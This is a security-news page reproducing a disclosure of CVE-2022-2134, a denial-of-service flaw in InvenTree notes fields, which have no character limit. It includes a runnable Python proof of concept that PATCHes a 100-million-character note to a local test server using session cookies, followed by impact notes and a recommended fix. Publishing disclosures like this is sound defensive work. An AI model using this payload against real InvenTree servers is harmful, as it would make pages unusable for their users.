Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-2134: Lack of Character Limit in Notes Sections Leads to Denial of Service in inventree

Denial of Service in GitHub repository inventree/inventree prior to 0.8.0.

CVE
Open in Source
#csrf#windows#dos#js#git#java#firefox

Description

The InvenTree application allows for the inclusion of notes for various objects in the application. The notes functionality does not include a character limit. An attacker can submit an infinite number of characters into the notes section, which causes a denial of service and increased processor usage for the victim. The tester tested against the Stock Parts and Parts notes sections. Tester assumes that other objects in the application that have notes available would also be vulnerable, however did not test it due to consumption of local resources.

Tester was able to add in excess of one hundred million (100,000,000) characters or more with the included PoC during testing.

Proof of Concept

import requests as request_handler

burp0_url = "http://192.168.1.5:8000/api/part/1/"
burp0_cookies = {"csrftoken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "sessionid": "un2jcwzkr7ofla5c3vmfwfjw7z38blj3"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.5:8000/part/1/", "Content-Type": "application/json", "X-CSRFToken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "X-Requested-With": "XMLHttpRequest", "Origin": "http://192.168.1.5:8000", "DNT": "1", "Connection": "close"}
echo_time = "A"*100000000
burp0_json={"notes": echo_time}
request = request_handler.patch(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
print(request.text)
print(request.status_code)

Impact

Should a user visit one of the exploited parts, the vulnerable page will not load appropriately. The victim may see their computer become unresponsive as the processor works to process the amount of data being served by the vulnerable notes section.

Recommendation

Apply a consistent character limit across the application where user input can be added to notes sections.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE